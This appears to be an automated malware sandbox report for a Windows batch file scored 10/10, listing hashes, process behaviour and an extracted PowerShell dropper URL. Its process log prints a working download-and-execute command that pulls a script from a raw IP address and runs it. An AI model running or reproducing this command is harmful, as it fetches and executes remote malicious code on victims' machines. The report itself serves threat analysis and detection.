Analysis
-
max time kernel
146s -
max time network
68s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
01-06-2020 02:10
Static task
static1
Behavioral task
behavioral1
Sample
ef447ab5d2ae0a9d701c838651e09c94.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
ef447ab5d2ae0a9d701c838651e09c94.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
ef447ab5d2ae0a9d701c838651e09c94.bat
-
Size
222B
-
MD5
c5368e48c478684dfe98d32e80ae5937
-
SHA1
306390ba49636df25818c32788ed3fe603394007
-
SHA256
80a177482b2efdaad3bf92dd550933e4a859bfc987e2511c301838d687fdfe86
-
SHA512
080141c425524360ce79c56e3de9f7196c4527001ed7c763056876ef2c5dd078a9751f7e3a87a0914928327b218428870e07f979d1c26a29390112142df55fbe
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/ef447ab5d2ae0a9d701c838651e09c94
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 416 3872 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 416 WerFault.exe Token: SeBackupPrivilege 416 WerFault.exe Token: SeDebugPrivilege 416 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
WerFault.exepid process 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ef447ab5d2ae0a9d701c838651e09c94.bat"1⤵PID:3008
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ef447ab5d2ae0a9d701c838651e09c94');Invoke-NAGUEMUGEPDJGKM;Start-Sleep -s 10000"2⤵PID:3872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:416